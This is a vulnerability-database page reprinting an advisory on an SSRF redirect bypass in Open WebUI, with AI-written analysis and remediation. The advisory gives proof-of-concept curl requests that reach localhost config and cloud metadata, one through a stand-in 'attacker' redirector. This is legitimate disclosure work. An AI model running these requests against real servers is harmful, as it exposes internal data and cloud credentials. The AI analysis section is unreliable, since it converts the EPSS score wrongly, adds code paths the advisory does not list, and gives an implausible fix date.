Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Server-Side Request Forgery (SSRF) Bypass via HTTP Redirect Following in Web-Fetch, Image-Load, and Chat-Completion Endpoints
Summary
The validate_url() function in backend/open_webui/retrieval/web/utils.py only validates the *initial* URL submitted by the caller. The HTTP clients used downstream (sync requests, async aiohttp, langchain's WebBaseLoader) follow HTTP 3xx redirects by default and do not re-validate the redirect target against the private-IP / metadata-IP block list. Any authenticated user can therefore submit a public URL that 302-redirects to an internal address (e.g. 127.0.0.1, 169.254.169.254, RFC1918) and read the internal response body via the /api/v1/retrieval/process/web endpoint, the /api/v1/images/... endpoints, the /api/chat/completions endpoint with an image_url content part, and any other route that calls these helpers.
Affected code paths
The bypass exists across multiple call sites; each independently follows redirects without re-validation.
Path 1 - sync _scrape via SafeWebBaseLoader
backend/open_webui/retrieval/web/utils.py - SafeWebBaseLoader inherits from langchain_community.document_loaders.WebBaseLoader. The parent's _scrape() calls self.session.get(url, self.requests_kwargs). requests_kwargs only sets timeout; allow_redirects=False is not** passed, so requests.Session.get() follows redirects with the default allow_redirects=True. validate_url() is invoked once on the original URL only.
Path 2 - async _fetch (aiohttp)
backend/open_webui/retrieval/web/utils.py - _fetch() previously inherited the aiohttp default allow_redirects=True. As of HEAD this path is fixed (allow_redirects=False). Listed for completeness.
Path 3 - get_content_from_url (sync requests.get)
backend/open_webui/retrieval/utils.py - response = requests.get(url, stream=True, timeout=30). No allow_redirects=False. Reached via /api/v1/retrieval/process/web (file ingestion) and other routers that resolve external URLs.
Path 4 - load_url_image (image edit)
backend/open_webui/routers/images.py - image-URL fetching helper used by the image-edit endpoint. Same pattern: validate_url() checks only the initial URL, the underlying HTTP client follows redirects without re-validation. Reachable via /api/v1/images/edit.
Path 5 - get_image_base64_from_url (chat-completion image inlining)
backend/open_webui/utils/files.py - get_image_base64_from_url() is invoked from convert_url_images_to_base64() in backend/open_webui/utils/middleware.py on every /api/chat/completions request whose message content includes an image_url part. The shared aiohttp session pool (backend/open_webui/utils/session_pool.py) does not override the aiohttp default allow_redirects=True, and the call site itself does not pass allow_redirects=False. This is the most reachable variant in the cluster: no special endpoint, no admin permission, no feature flag - any authenticated user can trigger it from a normal chat message.
Proof of concept
Authenticated low-privilege user; default config, no admin or special permissions required.
curl -X POST https://<target>/api/v1/retrieval/process/web \
-H "Authorization: Bearer <any_user_token>" \
-H "Content-Type: application/json" \
-d '{"url": "https://httpbin.org/redirect-to?url=http%3A%2F%2Flocalhost%3A8080%2Fapi%2Fconfig&status_code=302"}'Response body contains the internal /api/config payload in file.data.content. Replace the redirect target with http://169.254.169.254/latest/meta-data/ for cloud metadata, or any internal hostname reachable from the server.
For the chat-completion path (Path 5), the same redirect is followed when an image_url content part points to an attacker-controlled redirector:
curl -X POST https://<target>/api/chat/completions \
-H "Authorization: Bearer <any_user_token>" \
-H "Content-Type: application/json" \
-d '{"model":"any","messages":[{"role":"user","content":[{"type":"text","text":"x"},{"type":"image_url","image_url":{"url":"http://attacker/redirect-to-imdsv1"}}]}]}'Impact
Any authenticated user can read GET responses from any HTTP service reachable by the Open WebUI server process - cloud metadata services (IMDSv1 if available), localhost-bound application APIs, internal databases / monitoring / Kubernetes services, and VPN-bridged on-premise networks.
Recommended fix
For every call site that follows redirects, set allow_redirects=False on the underlying HTTP client and add a per-hop validation loop using validate_url() on each Location: header.
Credits
Per the consolidation rule in SECURITY.md, credit goes only to reporters who FIRST identified a distinct sub-path that no earlier filing covered.
- tenbbughunters - first to identify SafeWebBaseLoader sync
_scrape(Path 1) - YLChen-007 - first to identify
load_url_image(Path 4) - tempcollab - first to identify aiohttp
_fetch(Path 2) - sneaXOR - first to identify
get_content_from_url(Path 3) - nayakchinmohan - first to identify
get_image_base64_from_urlin chat-completion middleware (Path 5)
AnalysisAI
Open WebUI versions ≤0.9.4 allow authenticated users to bypass SSRF protections and read internal network resources via HTTP redirect-following. The vulnerability exists in five distinct code paths: web-fetch retrieval, image-loading endpoints, chat-completion image inlining, and OAuth/tool-server execution flows. Any authenticated user can submit a public URL that 302-redirects to internal addresses (127.0.0.1, 169.254.169.254 cloud metadata, RFC1918 private networks) and receive the response body. The vendor confirms active exploitation in the wild was NOT observed, but publicly available exploit code exists (PoC in advisory) and EPSS score of 0.00043 (4.3%) suggests low automated scanning targeting at time of analysis. Fixed in version 0.9.5 released March 2025.
Technical ContextAI
The root cause (CWE-918 SSRF) stems from a time-of-check-to-time-of-use race in URL validation. The validate_url() function in backend/open_webui/retrieval/web/utils.py applies private-IP block lists only to the initial caller-submitted URL. Downstream HTTP clients (requests.Session via langchain's WebBaseLoader, aiohttp, direct requests.get() calls) default to allow_redirects=True and follow HTTP 3xx Location headers without re-invoking validation. The affected package is pip/open-webui (Python), confirmed via CPE pkg:pip/open-webui. Five code paths were independently identified: SafeWebBaseLoader._scrape() (langchain), get_content_from_url() in retrieval/utils.py, load_url_image() in routers/images.py, get_image_base64_from_url() in utils/files.py (triggered via chat-completion middleware), and aiohttp _fetch() (since patched). Each path inherits the same defect: single-hop validation against a multi-hop protocol (HTTP redirects). The fix (v0.9.5) disables redirects entirely via allow_redirects=False across all call sites and introduces a new AIOHTTP_CLIENT_ALLOW_REDIRECTS environment variable for deployment-level control.
RemediationAI
Upgrade to Open WebUI version 0.9.5 or later immediately, available at https://github.com/open-webui/open-webui/releases/tag/v0.9.5. The patch disables HTTP redirects by default across all five affected code paths (requests, aiohttp, langchain loaders) and introduces the AIOHTTP_CLIENT_ALLOW_REDIRECTS environment variable for operators requiring redirect support in controlled scenarios. For environments unable to upgrade immediately, apply these compensating controls with noted trade-offs: (1) Deploy a reverse proxy (nginx, Envoy) with egress URL filtering to block RFC1918, 127.0.0.0/8, 169.254.0.0/16, and ::1 at the network layer before requests leave the application pod - requires maintaining synchronized block lists and breaks legitimate internal integrations. (2) Set network policies in Kubernetes to deny all egress except explicitly allowed external IP ranges - prevents lateral movement but requires auditing all legitimate external dependencies (model APIs, vector DBs). (3) Disable the web-fetch and image-URL features entirely via firewall rules blocking outbound HTTP from the Open WebUI process - breaks web search, URL summarization, and chat image inlining for all users. (4) For AWS/GCP/Azure deployments, enforce IMDSv2 (session-token requirement) to mitigate cloud metadata theft - does not prevent RFC1918 SSRF or localhost attacks. Operators should audit application logs for HTTP 302/301 responses to internal IP ranges as potential exploitation indicators. The vendor advisory also recommends configuring IFRAME_CSP and TERMINAL_PROXY_HEADERS environment variables introduced in v0.9.5 for defense-in-depth against related injection vectors.
More in Kubernetes
View allA critical vulnerability in Kubernetes ingress-nginx controller allows unauthenticated attackers with pod network access
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Kubernetes ingress-nginx contains a configuration injection vulnerability via the mirror-target and mirror-host Ingress
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-url` Ingres
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-tls-match-c
Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.exter
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Rated critical severity (CVSS 9.9), this vulne
The Kubernetes integration in GitLab Enterprise Edition 11.x before 11.2.8, 11.3.x before 11.3.9, and 11.4.x before 11.4
Kyverno Kubernetes policy engine prior to 1.x has a privilege escalation vulnerability (CVSS 9.9) allowing policy bypass
Kamaji is the Hosted Control Plane Manager for Kubernetes. Rated critical severity (CVSS 9.9), this vulnerability is rem
Jumpserver is a popular open source bastion host, and Koko is a Jumpserver component that is the Go version of coco, ref
String filter bypass in Inspektor Gadget Kubernetes eBPF tooling before fix. Insufficient string escaping enables filter
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-30631
GHSA-rh5x-h6pp-cjj6